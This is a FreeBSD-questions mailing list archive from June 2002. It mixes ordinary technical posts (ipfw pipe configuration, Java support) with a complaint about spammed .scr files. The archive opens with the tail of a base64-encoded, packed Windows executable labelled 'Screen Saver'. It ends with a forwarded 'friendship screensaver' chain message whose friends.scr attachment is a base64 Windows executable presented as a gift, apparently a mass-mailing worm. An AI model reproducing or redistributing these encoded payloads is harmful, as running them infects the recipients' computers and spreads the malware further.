Y2gPUOEOTEb3jrIZM/eCbJEcTSjECkLE9cxsAlsjSlNrd+rLEEFsNg0cjoozlnwVbMhFoniHUgYO YW5JoKMkIGMa6HJQ2Wv20N00Zkl0owwCBrMdXY5ms441lUlkMxoEWzjMcJWvdpMkitMsHhf0A6cI jhQrbm6zNs3WHIoFIyP8/3NZlmXZAjQXNwkElFiWZRATA3TIZch/+VBFTAEEAL7RAj3i78X4DwEL AQbGAwCYaQDd7BsJ8aANQAsDBEx2s2AzBxswAcDGZkEIDBAHNtjL3gYAiKVSIDe3AiTiGAehVIOJ K2woAh4upgJ7IRvsboKQkJiSArK5InhgLnLF+7DmspkbFLACQN5pNrwuJgc8VsAHWhVtyifAT2yV jb3nC+vzc/BPANB+vxtQqA21JwkAAAAAAAAASP8AAAAAAAAAAABgvgDwQACNvgAg//9Xg83/6xCQ kJCQkJCKBkaIB0cB23UHix6D7vwR23LtuAEAAAAB23UHix6D7vwR2xHAAdtz73UJix6D7vwR23Pk McmD6ANyDcHgCIoGRoPw/3R0icUB23UHix6D7vwR2xHJAdt1B4seg+78EdsRyXUgQQHbdQeLHoPu /BHbEckB23PvdQmLHoPu/BHbc+SDwQKB/QDz//+D0QGNFC+D/fx2D4oCQogHR0l19+lj////kIsC g8IEiQeDxwSD6QR38QHP6Uz///9eife5PAEAAIoHRyzoPAF394A/A3XyiweKXwRmwegIwcAQhsQp +IDr6AHwiQeDxwWJ2OLZjb4AIAEAiwcJwHRFi18EjYQwGEcBAAHzUIPHCP+WuEcBAJWKB0cIwHTc ifl5Bw+3B0dQR7lXSPKuVf+WvEcBAAnAdAeJA4PDBOvY/5bARwEAYek7Hf//AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAwAAACgAAIAOAAAAaAAAgBAAAACoAACAAAAAAAAAAAAA AAAAAAABAAEAAABAAACAAAAAAAAAAAAAAAAAAAABAAkEAABYAAAA7FABAOgCAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAQBsAAAAgAAAgAAAAAAAAAAAAAAAAAAAAQAJBAAAmAAAANhTAQAUAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAEAAQAAAMAAAIAAAAAAAAAAAAAAAAAAAAEACQQAANgAAADwUwEA KAMAAAAAAAAAAAAAGCQBACgAAAAgAAAAQAAAAAEABAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAACAAACAAAAAgIAAgAAAAIAAgACAgAAAwMDAAICAgAAAAP8AAP8AAAD//wD/AAAA/wD/AP// AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAARt337bgnIyNXTLm6qxj1SJtrQAnehn09rlE/mGBnQ3SxqXSEwTxJXDhhw2ER9wa7DHrMqIYG n1M4al+tXqnzZGWnUTkJOnafMDNTsfDp4WocLHi1yObsQfVxOE8m38UGuk9Hu2Sinsj4fp2T1OyC NDSF9McgTxPoHGpm6U7j2aNoTxLfKRULj3aSC9eQwUXQT9Xwud4VFrQpr9fgTG7SXWmfNXl3sJk5 ksOulNEG8XFR9PN8FPSTtMXdKOgjIKqHyZ5SgES8pITNC+jLLT7sEX3osRtsg5RtBQ0hjYlXC27n IQv4ITPf14qAy9WlwfIFSRCUn28xuDfFiU6kHD/Yv2Io2R1V3qU+ibWRARqlRkdkIEU9MB7WrZ4I eOnlBJvB5SBQJuB8j0fPmEF+MgqEm5tFE0GWjXhj86ARaxuCQ3uE1cZWpYPpLH9aDPUiwvUcJNSZ GjtMdjicrcoR --snccfju-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12: 3:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from patriarch.dnsalias.org (adsl-66-140-18-199.dsl.hstntx.swbell.net [66.140.18.199]) by hub.freebsd.org (Postfix) with ESMTP id 1318937B764; Tue, 25 Jun 2002 12:01:46 -0700 (PDT) Received: from compgeek ([127.0.0.1]) by patriarch.dnsalias.org with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 14:01:50 -0500 Reply-To: From: "Jon Noack" To: "Alexander" , Cc: , Subject: RE: ipfw question Date: Tue, 25 Jun 2002 14:01:50 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20020625212231.U4383-100000@bugs.elitsat.net> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-OriginalArrivalTime: 25 Jun 2002 19:01:50.0817 (UTC) FILETIME=[C34FCD10:01C21C7A] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Not that I know of (isn't that the point of fw.one_pass -- it only matches one rule). Why don't you want to use fw.one_pass? (If it's because you're using bridging I may be able to help) Jon Use the freebsd-ipfw list. I've sent them this message as well. -----Original Message----- From: owner-freebsd-questions@FreeBSD.ORG [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Alexander Sent: Tuesday, June 25, 2002 1:39 PM To: freebsd-questions@freebsd.org Cc: freebsd-isp@freebsd.org Subject: ipfw question Hello, I have few clients which should share 1 channel of 256Kbit/s and each one of them should have max 64Kbit/s. The idea is like 5-6 clients to share 256Kbit/s I do the following pipe configs ipfw pipe 1 config bw 64Kbit/s queue 5 ... ipfw pipe 6 config bw 64Kbit/s queue 5 ipfw pipe 7 config bw 256Kbit/s queue 5 ipfw add pipe 1 all from any to any via tun0 ipfw add pipe 7 all from any to any via tun0 ... ... ipfw add pipe 6 all from any to any via tun5 ipfw add pipe 7 all from any to any via tun5 (Each client has a tunnel) And what happens is that packets only go to the first rule and everyone have 64k but they don't share one 256k/s channel Is there a way doing this without using sysctl variable net.inet.ip.fw.one_pass ? thanks P.S. I'll be glad if someone responds as quick as possible. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12: 5:33 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp-relay-2.adobe.com (smtp-relay-2.adobe.com [192.150.11.2]) by hub.freebsd.org (Postfix) with ESMTP id 3377937B811 for ; Tue, 25 Jun 2002 12:04:25 -0700 (PDT) Received: from inner-relay-2.corp.adobe.com (inner-relay-2 [153.32.1.52]) by smtp-relay-2.adobe.com (8.12.3/8.12.3) with ESMTP id g5PJ259A020418 for ; Tue, 25 Jun 2002 12:02:05 -0700 (PDT) Received: from mailsj-v1.corp.adobe.com (mailsj-dev.corp.adobe.com [153.32.1.192]) by inner-relay-2.corp.adobe.com (8.12.3/8.12.3) with ESMTP id g5PJ2EUU000925 for ; Tue, 25 Jun 2002 12:02:14 -0700 (PDT) Received: from mtbiker.net ([153.32.129.64]) by mailsj-v1.corp.adobe.com (Netscape Messaging Server 4.15 v1 Jul 11 2001 16:32:57) with ESMTP id GY9ZN200.CIT for ; Tue, 25 Jun 2002 12:04:14 -0700 Message-ID: <3D18BEAE.80200@mtbiker.net> Date: Tue, 25 Jun 2002 12:04:14 -0700 From: John Martinez User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.0.0) Gecko/20020611 X-Accept-Language: en-us, en MIME-Version: 1.0 To: freebsd-questions@FreeBSD.ORG Subject: I hate to bring it up again (spamming) Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Can one of the list admins please block Edwin Renders (or whoever it is) from posting the stupid DOS files on this list? I use Windows at work occasionally, but I'm not susceptible on my Solaris, FreeBSD or Mac OS X boxes from having problems with .scr files. It's just ANNOYING!!! Thanks, -john To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12: 6:59 2002 Delivered-To: freebsd-questions@freebsd.org Received: from patriarch.dnsalias.org (adsl-66-140-18-199.dsl.hstntx.swbell.net [66.140.18.199]) by hub.freebsd.org (Postfix) with ESMTP id DD5A037B82C for ; Tue, 25 Jun 2002 12:04:38 -0700 (PDT) Received: from compgeek ([127.0.0.1]) by patriarch.dnsalias.org with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 14:04:43 -0500 Reply-To: From: "Jon Noack" To: "Jukka Lehti" , Subject: RE: Java on FreeBSD Date: Tue, 25 Jun 2002 14:04:43 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20020625184320.93592.qmail@web20310.mail.yahoo.com> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-OriginalArrivalTime: 25 Jun 2002 19:04:43.0781 (UTC) FILETIME=[2A680350:01C21C7B] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Does anyone know current situation? Check the freebsd-java list. They're still working on getting HotSpot to work -- until it does they can't release an official version (my take on it at least). Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:11:24 2002 Delivered-To: freebsd-questions@freebsd.org Received: from eomer.vianetworks.nl (eomer.vianetworks.nl [212.61.15.10]) by hub.freebsd.org (Postfix) with ESMTP id 4C68837B811 for ; Tue, 25 Jun 2002 12:05:46 -0700 (PDT) Received: from mail.iaehv.nl (pm17d290.iae.nl [212.61.5.36]) by eomer.vianetworks.nl (Postfix) with SMTP id 73CE1211F6 for ; Tue, 25 Jun 2002 21:04:01 +0200 (CEST) From: Edwin Renders To: freebsd-questions@FreeBSD.ORG Subject: Fw: Date: Tue,25 Jun 2002 21:05:48 PM X-Mailer: Microsoft Outlook Express 5.50.4133.2400 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary=logdwtu Message-Id: <20020625190401.73CE1211F6@eomer.vianetworks.nl> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --logdwtu Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Attached one Gift for u..

Edwin Renders

----- Original Message -----
From: "shakinglove" < screensaver4u@fucker.net >
To: < erenders@iaehv.nl >
Sent: Tue,25 Jun 2002 21:05:48 PM
Subject:


This e-mail is never sent unsolicited. If you need to unsubscribe,
follow the instructions at the bottom of the message.
***********************************************************

Enjoy this friendship Screen Saver and Check ur friends circle...

Send this screensaver from www.fucker.net to everyone you
consider a FRIEND, even if it means sending it back to the person
who sent it to you. If it comes back to you, then you'll know you
have a circle of friends.

* To remove yourself from this mailing list, point your browser to:
http://fucker.net/remove?freescreensaver
* Enter your email address (erenders@iaehv.nl) in the field provided and click "Unsubscribe".

OR...

* Reply to this message with the word "REMOVE" in the subject line.

This message was sent to address erenders@iaehv.nl
X-PMG-Recipient: erenders@iaehv.nl
<<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>> <<<>>>
--logdwtu Content-Type: application/octet-stream; name=friends.scr Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="friends.scr" TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAABXZioCEwdEURMHRFETB0RRkBtKUR4HRFH7GE5RCQdEURMHRFEQB0RRcRhX UR4HRFETB0VRkAdEUfsYT1EWB0RRqwFCURIHRFFSaWNoEwdEUQAAAAAAAAAAUEUAAEwBAwC+0QI9 AAAAAAAAAADgAA8BCwEGAABgAAAAEAAAAOAAAABLAQAA8AAAAFABAAAAQAAAEAAAAAIAAAQAAAAA AAAABAAAAAAAAAAAYAEAAAQAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAA AAAYVwEApAEAAABQAQAYBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAuLi4wAAAAAADgAAAAEAAAAAAAAAAEAAAAAAAAAAAAAAAAAACAAADgLi4uMQAAAAAA YAAAAPAAAABeAAAABAAAAAAAAAAAAAAAAAAAQAAA4C5yc3JjAAAAABAAAABQAQAACgAAAGIAAAAA AAAAAAAAAAAAAEAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAkLi4uLi4uLi4uLi4uLi4uLi4u Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u Li4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4uLi4u Li4uLi4uLi4uLi4uLi4uLi4uLiAkCgAuLi4hDAkCCVblYQe3/adfWykBAPdaAAAAAAEAJgMAm337 //+LRCQEi8iKEITSdA2A8r2IEYpRAUEMdfPDkP///48AVleLfCQMvvzQQACLBlBX6AMAVvyDxAiF wHUT8l/+/4PGBIH+sNFAAHzlX7gBAF7DXzPAXsOQt7fdB4HsIBpTVUdowNMq/xW7u//d5KBJ2IXb iVwkGA+EQhyLNegTaLDft993HlP/1micB4v4CYvoaIQLiW227e1sJCgNhf+JqhQxCYXta3fLswcB wPl4aNAHBJo127+9V4eL8JwEhfaJdCQcGuWNpvseuzQQUB9W/9cvwBSL++9d+zPtwegCEFQQD46r FN6LC1FqS9q3p3v/Dx+m7PBJdHSNVH72trXvRSRSagRQQwwwNHRfiwe7+Xb/JI1MJCxoBIZRUhck R418E7e7X3iDyf8G8q730Uk2LFFQTKihYXMjLL9CD00SUkZhs20vdAlyVm7wg8dP371uZP/YEfiA nEWDwwQ7vq5h++gPjF//AIszi9pW63w8/Gbr6VNbEF9eXVuBxGjDhe/WLG8oVVRqAmTYRD/3ZOGD /f8KggTHAyBQVYa30H0d0n9kax196Alpxr499L6nDjRadwi7F4wYUB/XEQUMuobL2NvTBcoQEGAQ dusYeVHMJ66dW1XPnDDOdl2kKB9kAwvurYudDIK8JIAOsD/tuobuAA8Aa9z/aDGAVizU4XPPzgwH MMwH0A0ogO7cz8ItCIQkeDyFFI2UrWvd1yaEiwtSR6hRI1zYNJgEuxgQUjgAoPDPUIiqOoPDiy0A lnXf20uNhDpFIDTVLK5waxYUByBShBgYTT7bkGcrNAIk/B0U4bHQ4RiG/ieFVsqywdxh0/VF1EHV NCdD9okPwZREjA35LI9Qi0RRUlDm3uywV8fNIJKOp7PwYY/np4P4AvKtY4PsPawhsKqELnUNjlVe NWAdUqkNQTUE6VjVyyCXfPu5d5yYINaD6AXGtEVRVyexdzaYNldjvz03hdO9p1YEuA4yBAswCbEM cSt0TL2MALKMUR8QAe3t1Y14CG4MR7hoWNQt13U0TQICDGFk4hgity7sQhwjaEwaSVwAoWzL3TUw FmjEDtZgIAvf/SmWr0ufmbkJlPf5ixSVnJMO4XDMQALWWBBdQ8t1jYAiBIwBbDCFIFu7aA2AUNBg Qx3MtrkjJx1TEkyzPVuXO4UQYywnnPjCJr11xnzxdRJTEWC3nu1YAQRXKqDo5XUGR/en21fpnQZk ejPJM/bQQxB99/e3B3Yqi9WB6sSB+Sk9cxqKhAr3f2/3DotdiIEJKEE7yHLeVcYPL7+Vj2OY6+t0 v/AFsCA7e/vvbyoUc1SKlC4OgPo6fAUEQH4KCbNvf3N6fTB/FDrQdCAIDXUmRlHIdsn3R0HrHQ8L DQqRwsKePQJGR4t8pnHiEBZeIYfuUVNUwQ7zkN+wl6wAWXKdgiYOZ05ccQ7hEF57A8NGBNf40Ax+ OdNScAmOhXp2M3FXZGEGg23wCW1XB+RADrBWF1ZNyc5hpVcrF7yfMyedAKlYsBJo3mVPjqxLmKGk AlhrZ2bApEAUV5A9sJkcZ1Sv0R1s1GymM6qBaAVkJTDMA66F/d6Vmg22/XPECYXSfjWJOBQU+uaN He5rFooXiP8XjVSJh2ALHVBO/Ugxeq1J+HXPVYYc4t+Z3WXr1lYCV7kQw75outmDNet45vOlpOkT MM6RkMrtksCTkaUTdyQR31aJyQnLi+hVoFZ+POHrxKgRVY9Q/yG85ewZIJ6HflcagVxgoBZGmtDF U3Qkgk7ttwycJfnnIXmKBFgT//8WRsHgCDv1fQsz24ocFgPDbhQStf+3A4vQFPoSg+I/ilQUeIgX Drv5HrINDFcBDgaD4D83K/DdXxOKRAQXAohHA34DBP0mfn89jUUBO/AKAj3xQYP5E3U1a2fhcNsQ G8bbyEPTme4KB4HxSFDnWmuYcDRQU9yZKMBe9gubLRVBhclrxkSMKABFHBjABjWLrww9zWALVDVS ZwdDpC7cUJk2aQZLOJBRlPpELGTpWxJQU1D1Bo8Or09+/3QEEnAG3qsKxwV8RhrPdqYT+rhMG6rM 7EnICe9DBV5XM/+4z4k9L8Bg5BKp/KEQLFwyt3NMG59oG94AohvflP0793UjvQxXTQLeQv9zrCTY g/v/dQ2wxafvnm7NImPk33AIHzvHdQ/xH+TSahl8DKLrBA+/QAhmx/Hv2MCY1GaFHotWDGoQiwKb oQs9R1IsCIn2ohDHLmSRoljQYAt3f3IPplh2FCXNCkyhgNf1ZnLZ0m90D4vtIO16UHgj1xA7xSkQ w6kWSP0FInhs4G6m7Dn0Hg6l2CjknuG1V8S7GO3aP+Z0SDmsgIl1P5wzGxbchBss18OKHw6EZrvm UkQa4N+Z3het6V4sJCbGAk72EbZO1yykh3UOg7ywvlfeIlSFOwFy+1VpvtjDFnVLUm1QjEGY4y18 jnlmI+G64nDBgFCIvs4d62t2D2i8O194ILRoJLPtC1HHLXQn1Tci32s+fBlhUlak323P5lgtqh+c 39V2KLvYOdKjJt9AXBM2HbXh7zR8JQzrUKlkGxZLMGdn65EqPGSwc/QUDTjNY+7szK5wfEJWdxTT dLYZwGNsWrivCmfkYN+kUZ+6oS1CPS4QeC0Yosdpe/XbTEi0nFcdnWNG1VMjtFxwagVLyBlyUbxs hvnIJTOjeH5mZffSpAF8aoKOH1rGdnHotUwhcg6w1SXIF/6PpHkFSIPI/kAB/v7//+h25VFk3k8N Xaj4h4Bh5rlw6MFQcGyYmd78H+stUwwJM/7AAXUjRytMhjQYlh8usCZIKBQCLSWUSyZ7M29mlUDd 2CUNksQUZGqQjAcyYSNRZpRSPF0sIV9euDgFWQjh8V4qB+HAoTjpBQ85yDfND5ZoaDDeQIAI8OtG oMjgIBRqSgkEvd6bPOmQIDNYZV25NZloLNFAC5Q7nDwX8lJoFGyETIvBprlQUVQQ3l3zuVOyp7AI hnlRNCMD9hVRIATWilxoxoWLEuZ1LMjDvmbAkyE24N/JAHZgGVcAnr0ZLw5O0g743Www18WlWGxj JFAgWBu/ty8gg/+SaIzIQx42MHvs3XAb5CGbE2zf62Lc3Y/sLDYvJFKc6zJ2tmRz6mOUUXCgC2SH RLcdsYNkTQZ814xYqXNYm3DPdicZS3Jo6ViEIJKCTSBQIJEPjJWxy6xYDMnIL2ZOY0zdAEt2lb1o 0DyYxQl52RkYLPzcvOQF2eTcpLMLyNwP4RKSRTAnsNywF8ghmIzcr2ySiJx43ElAMpMDe8CfuWgx iwwCaQYbMD5gfgwswrcW7qIiIQ9hXxCE2+PkZEyIDkjbjP2zJCMRmlG8pJk5kFDaZpPCygXTFR1Z AZiQXhYZ5O6E2gAs2QTyJh94IA5ADghmVAVM2nMhh+wtbFzLRDx7KbAt+5r0HiQXMoE8NJBXUqyu lyTaUNIB5G4U2tY8jK7feCDrEQoPO8zZyAnhhETZKwjZ2aEETpTYF4TXIM3oJkNIgRIgK+yBlyTr FQ8S/BsJvMiQ1jtaO3KBbAwDioSHFWAXfEpArEAOWA5k1lmrsk5/pjGGPiV0I2CLDIW0TWGDdAlj JMsPrzkIBs5Uoic41kJ2kwkskjIdIGGKVK+wOZoc9sIdMwJ0KzUk4i3jkNMTbxuyIDBIOVukZZML ORwQ+EJOctgorwCYIA/jskST1etfp8jV7CXkITIds9DkwkK2tNCMnunMt2DASLSBMMQAjEVPPMzR Mw2EUv1RsNU4kM7gDbwjV4zAbED8mMFeV+QAEodArITVAfmSLfkoVxIOsJB0eagWMiHwaNXzwMIi CB3G37FdyCUxT3xMKbYyknf2EYIihL0rRIwgWMhV9kuDPEIOWJziAPzcJCYTcuTcyJ4nEnIKENWF lAo5YP741K6k2ZA0PLz8BCxpZUwT1sgBgyTM4/TUdoCQHA2ILQcIyRQDy/IQUknvStzUEQKnUMVd zY2keMgI5RJq5JBBk2AF3AiEK040hHbUsCJlD34sxKxoBHzUMIqVXVaAFDQNrHhaHxjxUpRTBDAH ait1DykO7FFXzFdmFIv4YcGRPddWzFKLNaSn45wwPIQgZbgggQGT0BmSZg8w3+sGUVIumawRvkm8 DBGLkELxBECCydMwvLwDkCDSkPO0A7mSATmEUIzCUtgbtFrlWrOZzo0eDxwFIDXBECm9qaQLpHhZ cVFWajLJWfspLKLY6RcJ2drJJJNM29zdZDB3M97GBd8FLtCRSSaZ0dLTVANwkNQnjJtQRiRYclvg L13TdJjuyHhqD7F0xnA+1U33/wiUXlnDH6wFV1gRoThCLSFHqjwAAUICR/JIKiAEBJSyeciuBcnY 6agF0OkOOesFdEbcA/xDviZ8uNGpdzIjdsSThJTGLgzgCBu5si8Q63JFDFEYEV8OOQf4FIUIybvs 